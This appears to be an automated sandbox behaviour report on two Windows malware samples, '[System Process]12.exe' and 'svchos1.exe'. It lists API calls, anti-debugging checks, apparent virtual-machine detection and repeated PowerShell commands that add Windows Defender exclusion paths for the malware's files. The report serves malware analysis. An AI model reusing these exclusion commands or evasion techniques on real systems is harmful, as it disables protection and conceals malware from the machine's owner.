Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002A7178 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	28_2_002A7178
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038392B0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	28_2_038392B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0385B250 lstrcat,lstrcat,lstrcat,FindFirstFileA,GetPrivateProfileStringA,lstrlen,strstr,GetPrivateProfileStringA,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,FindNextFileA,FindClose,	28_2_0385B250
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03839090 lstrlen,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	28_2_03839090
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038397D0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	28_2_038397D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03839B60 FindFirstFileA,FindClose,FindClose,	28_2_03839B60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0383BD60 FindFirstFileA,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	28_2_0383BD60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03839C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,	28_2_03839C40
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_002A7178 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	33_2_002A7178
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0316B250 lstrcat,lstrcat,lstrcat,FindFirstFileA,GetPrivateProfileStringA,lstrlen,strstr,GetPrivateProfileStringA,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,FindNextFileA,FindClose,	33_2_0316B250
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031492B0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	33_2_031492B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03149090 lstrlen,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	33_2_03149090
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031497D0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	33_2_031497D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03149B60 FindFirstFileA,FindClose,FindClose,	33_2_03149B60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0314BD60 FindFirstFileA,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	33_2_0314BD60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03149C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,	33_2_03149C40

Source: C:\Users\Public\Documents\MM\svchos1.exe

28_2_03838E60

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_0384B360 Sleep,GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,GetDriveTypeA,GetDiskFreeSpaceExA,GetTickCount,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLastInputInfo,GetTickCount,_access,lstrcpy,

28_2_0384B360

Source: C:\Users\user\Desktop\[System Process]12.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Thread delayed: delay time: 35000	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Thread delayed: delay time: 32000	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Thread delayed: delay time: 34000	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Thread delayed: delay time: 31000	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Thread delayed: delay time: 33000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: [System Process]12.exe, 00000009.00000003.2695630715.0000000001004000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(`
Source: [System Process]12.exe, 00000000.00000003.1265015941.000000000095F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW2
Source: [System Process]12.exe, 00000000.00000003.1801836328.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1837465779.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1855439284.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1265015941.000000000095F000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1769036710.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1265094563.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1725744891.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1581115762.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1813805390.00000000009BC000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000000.00000003.1689967566.00000000009BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\Public\Documents\MM\svchos1.exe	API call chain: ExitProcess graph end node			graph_28-105882
Source: C:\Users\Public\Documents\MM\svchos1.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\[System Process]12.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\Public\Documents\MM\svchos1.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_28-106729

Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_03846530 InterlockedExchange,InterlockedExchange,InterlockedExchange,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,ReleaseDC,BlockInput,DestroyCursor,DestroyCursor,

28_2_03846530

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_003717D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

28_2_003717D3

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_03851A50 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Sleep,

28_2_03851A50

Source: C:\Users\Public\Documents\MM\svchos1.exe

28_2_00383D98

Source: C:\Users\user\Desktop\[System Process]12.exe	Code function: 9_3_02F70031 mov eax, dword ptr fs:[00000030h]	9_3_02F70031
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016C0031 mov eax, dword ptr fs:[00000030h]	28_2_016C0031
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036F0031 mov eax, dword ptr fs:[00000030h]	28_2_036F0031
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03000031 mov eax, dword ptr fs:[00000030h]	33_2_03000031

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_01703D50 GetProcessHeap,

28_2_01703D50

Source: C:\Users\user\Desktop\[System Process]12.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_003717D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	28_2_003717D3
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_003789D8 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_003789D8
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016FB13E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_016FB13E
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016F342A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_016F342A
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016F2F35 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	28_2_016F2F35
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_003717D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_003717D3
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_003789D8 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_003789D8

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\[System Process]12.exe'"
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\[System Process]12.exe'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\[System Process]12.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\[System Process]12.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\[System Process]12.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"	Jump to behavior
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_038513B0 ShellExecuteEx,_access,Sleep,CreateFileA,GetFileSize,MessageBoxA,VirtualAlloc,MessageBoxA,ReadFile,CloseHandle,VirtualFree,MessageBoxA,VirtualFree,CloseHandle,

28_2_038513B0

Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
